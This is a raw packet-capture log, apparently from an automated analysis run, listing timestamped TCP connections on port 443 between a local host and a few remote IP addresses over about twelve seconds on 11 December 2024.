                                                                              Dec 11, 2024 15:19:48.825514078 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.825612068 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.825635910 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.835305929 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.835442066 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.835469961 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.870052099 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.885086060 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.901892900 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.905070066 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.905149937 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.905179024 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.911684036 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.911858082 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.911883116 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.921704054 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.921782017 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.921798944 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.921858072 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.929970980 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.929981947 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.930058956 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.930179119 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.930229902 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.938299894 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.938309908 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.938383102 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.942845106 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.942854881 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.942933083 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.950547934 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.950557947 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.950881004 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.956343889 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.958625078 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.958633900 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.958645105 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.958703995 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.958739996 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.958753109 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.964070082 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.964143038 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.964165926 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.966743946 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.966824055 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.971492052 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.971596956 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.972399950 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.972511053 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.972537994 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.972734928 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.976771116 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.976794004 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.976867914 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.979172945 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.979248047 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.980479956 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.980549097 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.983671904 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.983737946 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.984775066 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.984796047 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.984843969 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.993478060 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.993577003 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.994020939 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.994072914 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.994115114 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.994136095 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.998305082 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.998418093 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.001184940 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.001283884 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.009460926 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.009567976 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.013653040 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.013741970 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.021979094 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.022089958 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.023772001 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.023848057 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.023859978 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.023905993 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.023909092 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.023966074 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.023983955 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.023998976 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.030119896 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.030249119 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.035430908 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.035460949 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.035531044 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.035685062 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:49.035695076 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.036010027 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.036370039 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:49.036433935 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.036500931 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:49.043092012 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.043152094 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.050883055 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.050960064 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.055058002 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.055129051 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.079334974 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.088080883 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:49.149211884 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.149302959 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.153476000 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.153558016 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.160269022 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.160348892 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.163923025 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.163990021 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.170423031 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.170495987 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.173789024 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.173856020 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.180378914 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.180442095 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.185914040 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.185981035 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.188951969 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.189037085 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.195192099 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.195331097 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.197608948 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.197705030 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.197774887 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.197774887 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.197796106 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.197825909 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.197856903 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.200592995 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.200644016 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.200732946 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.201015949 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.201028109 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.432058096 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.432097912 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.432164907 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.432457924 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:49.432468891 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:49.518822908 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.519006968 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.519100904 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:49.519881964 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:49.519916058 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:49.658226967 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:49.658265114 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:49.658344030 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:49.658598900 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:49.658607960 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:50.414745092 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.415071011 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.415098906 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.415451050 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.415832996 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.415898085 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.415982008 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.463345051 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.642626047 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.643033028 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.643060923 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.643359900 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.643744946 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.643800974 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.643901110 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.687333107 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.875468016 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.875541925 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.875603914 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.876089096 CET49729443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:50.876111984 CET44349729104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:50.877686977 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:50.877942085 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:50.877957106 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:50.879023075 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:50.879097939 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:50.880053043 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:50.880134106 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:50.880202055 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:50.880209923 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:50.922095060 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:51.117007971 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:51.117101908 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:51.117162943 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.123639107 CET49730443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.123653889 CET44349730104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:51.134619951 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.134654999 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:51.134732962 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.134941101 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.134947062 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:51.137226105 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.137281895 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:51.137568951 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.137598991 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:51.137607098 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:51.335935116 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:51.336004972 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:51.336076021 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:51.336371899 CET49731443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:51.336388111 CET4434973135.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:51.336817980 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:51.336854935 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:51.336940050 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:51.337168932 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:51.337182045 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:52.419698954 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.419981003 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.419991016 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.420375109 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.420674086 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.420773029 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.420795918 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.421644926 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.421821117 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.421829939 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.422159910 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.422529936 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.422593117 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.422622919 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.463329077 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.467319965 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.470091105 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.470097065 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.643136024 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:52.643430948 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:52.643457890 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:52.643825054 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:52.644150019 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:52.644226074 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:52.644366980 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:52.691322088 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:52.863538027 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.864079952 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.864151001 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.864407063 CET49732443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.864424944 CET44349732104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.865291119 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.865390062 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.865448952 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:52.865495920 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.865531921 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.865930080 CET49733443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:52.865952969 CET44349733104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:53.127773046 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:53.128072023 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:53.128175974 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:53.128175974 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:53.128206015 CET4434973435.190.80.1192.168.2.16
                                                                              Dec 11, 2024 15:19:53.128237963 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:53.128266096 CET49734443192.168.2.1635.190.80.1
                                                                              Dec 11, 2024 15:19:53.539194107 CET49678443192.168.2.1620.189.173.10
                                                                              Dec 11, 2024 15:19:53.955687046 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:53.955738068 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:53.955818892 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:53.956039906 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:53.956048012 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.173305988 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.173701048 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.173716068 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.174057007 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.174365997 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.174418926 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.174505949 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.174592972 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.174617052 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.174684048 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.174707890 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.803596020 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.803642035 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.803668976 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.803694963 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.803714037 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.803723097 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.803735018 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.803750992 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.803778887 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.812170982 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.820611000 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.820672035 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.820683956 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.876135111 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.876178980 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.923114061 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.923238993 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.923258066 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.972624063 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.972660065 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.997682095 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:55.997735023 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:55.997747898 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.010175943 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.010226011 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.010236979 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.017915010 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.017982006 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.018003941 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.018071890 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.018112898 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.018121004 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.018158913 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.018198967 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.018352032 CET49735443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.018368959 CET44349735104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.040232897 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.040286064 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:56.040370941 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.040860891 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:56.040879011 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.250849962 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.251153946 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:57.251230001 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.251616001 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.251941919 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:57.252022982 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.252069950 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:57.293207884 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:57.293257952 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.695624113 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.695708990 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:57.695970058 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:57.696521044 CET49736443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:57.696568012 CET44349736104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:58.011132956 CET4968080192.168.2.16192.229.211.108
                                                                              Dec 11, 2024 15:19:59.381716013 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:59.381767988 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:59.381864071 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:59.382082939 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:59.382100105 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:00.605870008 CET44349737104.18.95.41192.168.2.16
